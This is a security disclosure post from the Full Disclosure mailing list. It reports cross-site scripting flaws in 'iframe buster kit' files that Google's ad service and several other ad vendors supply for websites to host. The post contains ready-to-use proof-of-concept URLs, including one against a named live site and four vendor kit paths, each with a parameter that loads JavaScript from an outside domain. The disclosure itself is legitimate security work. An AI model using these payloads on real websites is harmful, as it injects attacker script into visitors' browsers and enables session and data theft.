Google supported XSS kit aka AdExchange iframe buster kit

[Zmx <larouanne () gmail com>]

Hi list,

The DFP AdExchange service of Google (the service who provide ads) is
distributing an "Iframe Buster Kit" in order to allow iframe ads to expand
outside of the iFrame.

This needs some bypass of the restriction applied to iframe, so Google
provide a kit to install on your website:
- Help Document: https://support.google.com/dfp_premium/answer/1074250
- Kit:
https://storage.googleapis.com/support-kms-prod/DB3CE51C3A5F783ED8198CDA753995FEB913

The kit contains several html and js files to be hosted on your domains.

Some of those files (still provide by Google, remember) contains very
visible XSS code:
One of them is "predicta" that simply allow you to pass the domain of from
where to load the javascript.


Quick proof of concept:
- https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life

As expandable ads allow website to gain more ads revenue, those kits is
present in a lot of website.

Other "iframe buster kit" exist that are not provided by Google, and some
of them are also vulnerable.

> From my list I have:
- /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js
- /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js
- /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look
like different version exist however)
- /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js


Some source:
- Code of predicta_bf.html provide by Google in the kit:
https://pastebin.com/BggXDHNA
- Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b
- Code of rockabox: https://pastebin.com/xqhs3zyz

Tr4L

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/